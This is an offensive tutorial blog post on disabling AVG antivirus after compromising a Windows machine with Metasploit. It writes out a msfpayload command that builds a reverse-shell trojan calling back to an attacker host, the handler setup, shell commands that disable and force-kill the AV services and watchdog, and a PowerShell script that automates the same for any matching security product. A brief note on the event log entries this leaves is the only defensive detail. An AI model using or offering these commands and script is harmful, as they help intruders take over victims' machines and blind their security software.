Killing the Antivirus with Metasploit

This post explains one way of killing an antivirus engine's processes (AVG 9 in this tutorial) from a Meterpreter session obtained with the Metasploit Framework.

Create the trojan executable with the msfpayload utility (the X option writes out a Windows PE with the payload embedded):

msfpayload windows/meterpreter/reverse_tcp LHOST=<your_attacker_IP> LPORT=4444 X > evil.exe

Set up the handler in msfconsole (a module is selected with use, not set, and the handler has to be started with exploit before the trojan runs on the victim):
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_attacker_IP>
set LPORT 4444
exploit

Execute the trojan on the victim VM; you should get a reverse connection as in the screenshot. The obvious first attempt, the bundled killav script, does not work here:
meterpreter > run killav     (does not work against AVG)

AVG's processes are supervised by a watchdog: even when killav terminates one of them, it is respawned. The services therefore have to be taken apart by hand:

meterpreter > execute -H -f cmd.exe -c     (-H hides the window, -f names the program to run, -c channelizes its I/O so Metasploit can interact with it; the channel number is printed when the process is created)
meterpreter > interact <channel_number>

You now have a command shell on the victim machine. List the running processes:
C:\> tasklist

Since AVG runs as Windows services, ask tasklist to show which services each process hosts:
C:\> tasklist /SVC

Filter the output down to AVG (case-insensitive):
C:\> tasklist /SVC | find /I "avg"

Now investigate each service, starting with the AVG WatchDog service:
C:\> sc queryex avg9wd

Do this for each of the AV services.
The important thing to note is whether a service is STOPPABLE or NOT_STOPPABLE (listed in parentheses on the STATE line of the sc output). Then stop them accordingly:

STOPPABLE: net stop <service-name>, for example
C:\> net stop avg9emc

NOT_STOPPABLE: a service that refuses stop requests has to be killed instead, so first change its configuration so that the Service Control Manager cannot start it again (sc.exe requires the space after start=):
C:\> sc config avg9emc start= disabled
C:\> sc config avg9wd start= disabled

Do this for all the AVG services so that none of them is restarted, neither by a recovery action after the kill nor after a reboot. Disable the watchdog first, since it is the one that brings the others back. Now force-kill the processes, either all at once by image name (taskkill accepts a wildcard in /IM) or one at a time by PID:
C:\> taskkill /F /IM "avg*"
C:\> taskkill /F /PID 1220     (where 1220 is the PID of the process to kill, as shown by tasklist)

/F forces termination, so the process gets no chance to refuse. The wildcard form kills every AVG process in one command. Keep in mind that all of this is logged on the victim: the System event log records each start-type change as Service Control Manager event 7040 and each killed service process as event 7034 ("terminated unexpectedly"), so a defender reading the log sees the whole sequence.
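The same locate -> disable -> kill sequence, automated for every service whose name or display name matches a pattern. This is an added example and not code from the original post; it assumes an elevated shell on the victim (the cmd.exe channel must already run as Administrator or SYSTEM), Windows PowerShell (it uses Get-WmiObject so it also runs on the PowerShell 2.0 hosts of this post's era), and a script file name of killav.ps1 and parameter name -Pattern that are my own choice. Instead of reading STOPPABLE / NOT_STOPPABLE off the sc queryex output by eye, it takes the same flag from the AcceptStop property of Win32_Service, which also supplies the PID that taskkill needs.

```powershell
# Added example (not from the original post): automate locate -> disable -> kill for
# every service matching a pattern. Assumed: elevated context, Windows PowerShell.
# Run from the cmd.exe shell obtained through meterpreter:
#   powershell -ExecutionPolicy Bypass -File killav.ps1 -Pattern avg
param(
    [string]$Pattern = 'avg'   # default matches the avg9wd / avg9emc names used above
)

# Locate. Win32_Service carries the service PID and the AcceptStop flag that
# "sc queryex" prints as STOPPABLE / NOT_STOPPABLE; Get-Service exposes neither.
function Get-MatchingServices {
    Get-WmiObject Win32_Service |
        Where-Object { $_.Name -like "*$Pattern*" -or $_.DisplayName -like "*$Pattern*" }
}

$services = @(Get-MatchingServices)
if ($services.Count -eq 0) {
    Write-Output "No service matches '$Pattern'."
    exit 0
}

# Disable before killing: a Disabled service cannot be started again by the Service
# Control Manager, not by a recovery action after the kill and not at the next boot.
# "start= disabled" (with the space) is the syntax sc.exe requires; it must be called
# as sc.exe because plain "sc" is a PowerShell alias for Set-Content.
foreach ($svc in $services) {
    $line = "disable  {0,-12} state={1,-8} pid={2,-6} accept_stop={3}" -f $svc.Name, $svc.State, $svc.ProcessId, $svc.AcceptStop
    Write-Output $line
    sc.exe config $svc.Name start= disabled | Out-Null
}

# Stop the ones that accept a stop request (the STOPPABLE case) cleanly.
foreach ($svc in $services) {
    if ($svc.AcceptStop -and $svc.State -eq 'Running') {
        sc.exe stop $svc.Name | Out-Null
    }
}
Start-Sleep -Seconds 3

# Force-kill whatever is still running (the NOT_STOPPABLE case, watchdog included).
# Killing by PID rather than "/IM avg*" avoids hitting unrelated processes whose
# image name happens to share the prefix.
foreach ($svc in @(Get-MatchingServices)) {
    if ($svc.ProcessId -ne 0) {
        Write-Output ("kill     {0,-12} pid={1}" -f $svc.Name, $svc.ProcessId)
        taskkill.exe /F /PID $svc.ProcessId | Out-Null
    }
}
Start-Sleep -Seconds 3

# Verify. Any service still Running here was either respawned or the kill was denied
# (AV self-protection drivers can block process handle access even for Administrators).
Get-MatchingServices |
    Select-Object Name, State, StartMode, ProcessId |
    Format-Table -AutoSize
```

The final table is the check worth reading: StartMode should show Disabled and ProcessId 0 for every matched service. If a service comes back with a fresh PID, its watchdog was not among the matched services (widen the pattern) or the kill itself was blocked, in which case the manual commands above will not do any better.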

The idea is to:
Exploit the system -> locate the antivirus processes -> disable their services -> kill the tasks.
Happy hacking!



